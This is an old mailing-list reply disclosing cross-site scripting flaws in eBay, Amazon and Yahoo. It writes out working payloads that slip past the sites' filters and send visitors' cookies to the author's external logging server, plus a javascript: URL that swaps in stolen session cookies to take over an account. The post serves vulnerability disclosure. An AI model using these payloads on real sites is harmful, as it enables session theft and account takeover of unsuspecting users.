Re: Cross-Site Vulnerabilities (Still) Found in Major Web Sites

From: Andrew Wason (awat_private)
Date: Tue Jan 22 2002 - 06:10:58 PST

    &gt; Yahoo, MSN, AOL, Lycos, and Excite suffer from
    such attack.

    So do ebay and Amazon. Yahoo will let you post
    pretty much any script/html (in invites, auctions etc.).
    ebay tries to strip references to document.cookie in
    auction postings, but putting whitespace in there fools
    it and allows it to be posted, e.g.:

    document
    .
    cookie

    Amazon only allows what they call &quot;basic HTML&quot; in
    their auction postings, but you can still get script past
    their filter e.g.:

    &lt;b onMouseOver=&quot;new Image
    ().src='http://demo.rootbin.com:8080/~aw/logger.gif?
    cookie=' + escape(document.cookie)&quot;&gt;test&lt;b&gt;

    When the user mouses over the word test, their
    cookies will be logged in my webserves log file.

    If a site allows &lt;script&gt; blocks to be posted, you can
    log the visitors cookies with no interaction:

    &lt;script language=&quot;JavaScript&quot;&gt;
    new Image().src
    = &quot;http://demo.rootbin.com:8080/~aw/logger.gif?
    cookie=&quot; + escape(document.cookie);
    &lt;/script&gt;

    Yahoo is interesting because they allow script to be
    posted in their &quot;Yahoo Invites&quot;.
    http://invites.yahoo.com/
    So you can craft an invitation that logs the users
    cookies and have Yahoo email it to the specific
    Yahoo users whose accounts you want to access.

    I established accounts with each of these (ebay,
    Yahoo and Amazon) and was able to collect cookies
    on myself and log into that users account by
    manually setting those cookies in my browser. Once
    you have the cookies (e.g. for amazon), visit
    amazon.com and enter this in your browser URL field
    (all one line):

    javascript:void(document.cookie=&quot;session-id-
    time=del;expires=Fri, 31 Dec 1999 23:59:59
    GMT;domain=amazon.com;&quot;);void
    (document.cookie=&quot;session-id=del;expires=Fri, 31
    Dec 1999 23:59:59 GMT;domain=amazon.com;&quot;);void
    (document.cookie=&quot;ubid-main=del;expires=Fri, 31
    Dec 1999 23:59:59 GMT;domain=amazon.com;&quot;);void
    (document.cookie=&quot;x-main=del;expires=Fri, 31 Dec
    1999 23:59:59 GMT;domain=amazon.com;&quot;);void
    (document.cookie=&quot;ubid-main=002-7079596-
    1079533;domain=amazon.com;&quot;);void
    (document.cookie=&quot;x-
    main=OCoNWc8jtjGE0wvoNWc8jtjGEU0c?
    OkW;domain=amazon.com;&quot;)

    This first deletes your current session cookies and
    then replaces them with another users account
    information, logging you in (the account info above is
    bogus).

    On Yahoo, users can choose how long their
    accounts stay logged in before asking for a password
    again. So if you enter the Yahoo cookies during the
    time the user is logged in (within this window) you
    have full access to their email, calendar and a lot
    more.

    I notified Amazon, Yahoo and ebay a while ago - I had
    trouble finding out how to notify them. I ended up
    using feedback forms on their sites, and a feedback
    email alias at amazon.

    Amazon responded saying they use SSL so there's
    no problem (?). Yahoo responded with a form letter
    directing me to various FAQs, I replied and got no
    response. ebay did not respond.

    Andrew